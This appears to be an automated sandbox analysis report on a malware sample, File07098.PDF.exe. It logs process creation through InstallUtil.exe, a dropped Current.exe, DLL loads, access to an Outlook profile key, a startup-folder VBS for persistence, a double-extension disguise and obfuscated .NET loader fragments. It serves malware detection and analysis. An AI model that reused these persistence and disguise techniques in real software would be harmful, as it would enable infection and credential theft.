                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Current.exe "C:\Users\user\AppData\Roaming\Current.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: File07098.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: File07098.PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: File07098.PDF.exe, 00000000.00000002.2098203958.0000000006230000.00000004.08000000.00040000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2078600685.000000000279E000.00000004.00000800.00020000.00000000.sdmp, File07098.PDF.exe, 00000000.00000002.2089546543.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: File07098.PDF.exe, 00000000.00000002.2091778778.0000000004D30000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.cs.Net Code: Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777252)),Type.GetTypeFromHandle(xrJblLOASJjFccUKbK7.Pww2X3eZss(16777284))})
                .NET source code contains potential unpacker
                Source: File07098.PDF.exe, InterceptorDefinitionSpec.cs.Net Code: PrintBridge System.Reflection.Assembly.Load(byte[])
                Source: Current.exe.0.dr, InterceptorDefinitionSpec.cs.Net Code: PrintBridge System.Reflection.Assembly.Load(byte[])
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.3629d78.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.File07098.PDF.exe.35d9d58.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Yara detected Costura Assembly Loader
                Source: Yara matchFile source: 0.2.File07098.PDF.exe.5fc0000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2097674143.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06613181 push ebx; retf 2_2_06613182
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05F52E78 push esp; iretd 6_2_05F52E79
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'rDcdLJHFg3BL3vDexCB'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, oOadFQQ6QrWpyWxPsKq.csHigh entropy of concatenated method names: 'zTwQYmyxA1', 'P92QGFRcVc', 'xfs73kVC4iEbIGDsBJ3', 'GWa4TyVRaFumfratOrb', 'TMh75cVV9lOfi1oXLyo', 'oKd8erVH5M54PPrDar9', 'o8Bro5ViB6duugJnOp9', 'ISHJl1VMY71rTE5lQao', 'QuZ5tmVuRZICcDyZnPu', 'Ub6yMJVZ2u8NEulaiFn'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, BRDXFsKF7W5IlA0pYyJ.csHigh entropy of concatenated method names: 'tD6KkRErVl', 'IrkKbBIpqA', 'go4Kf3aygw', 'KkcK5DbCWM', 'VY7K6xKRqZ', 'LH8KwTFewK', 'taFKYMlM4V', 'iZmKGQQ39k', 'UP3KxT4oD0', 'l71KgOIsSU'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, LseevIOCAj1J5VWSK8t.csHigh entropy of concatenated method names: 'FIUOL0kixQ', 'k5bO9WBM7E', 'EmGOm8QCxZ', 'CIQOJ5GBCN', 'uFlO193kTf', 'HCpOy28sdT', 'DicOovOIhK', 'DHgO8Jy4fs', 'zhvOTwgpnc', 'kHwOaRCtqC'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, MnsHMHQ394wlpMTwA12.csHigh entropy of concatenated method names: 'YIbuO4HqhyaqydCUPUY', 'ICkMU5HcuGlY80FDaWb', 'C9rOOxjv9Y', 'pBuPSvHJ2l4gYyPYBCr', 'tJCrc9H1lHeaSl5Ddt3', 'D7MfKfHyP99AlFtZgTy', 'tq36RxHoWa7DXmJiSJB', 'WWhnotH8ssQAqtXhJrV', 'OP2IR0HT8ekDt6In0Ot', 'sG0QANHa0k95Tesu0Ty'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, C21M3M4JAESaIT7jM5.csHigh entropy of concatenated method names: 'MridaXYDv', 'p9TpkouoO', 'TQpIqAHc7', 'PGOlO2r7b', 'zMV8E93F5NssYHB0XG1', 'bVLbgq3Qsj6u74tlcQ4', 'U1BZVA3kN9IAnN45hPI'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, JaAoqwOzUF4TLlhYSpQ.csHigh entropy of concatenated method names: 'SEmwdCdZdI', 'uLFwpNI6Xl', 'k86wlng5vZ', 'zgvwIs5wt9', 'lPEwEDyigC', 'iIAwsQbhMW', 'kkHwvG9mok', 'xKsbNugmkB', 'D1kw02l05h', 'LjawABTmmn'
                Source: 0.2.File07098.PDF.exe.34c1978.4.raw.unpack, tyI0o3tAWRFSOBHUPbR.csHigh entropy of concatenated method names: 'kUntnCyT6H', 'Ex9tjREZ2v', 'esSt39uCpL', 'UMstCd6DWS', 'BrktRduUjf', 'UZHByFC6vaxdEocVwnT', 'AMVo3lCwWx8Zin0Gyvu', 'fejp0VCYTQnmiS5Gwmm', 'p2qdRPCGRcpVjX2AaX4', 'gqXgxSCx7W9mqrgLG80'
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile created: C:\Users\user\AppData\Roaming\Current.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to dropped file
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbsJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: File07098.PDF.exe
                Source: C:\Users\user\AppData\Roaming\Current.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
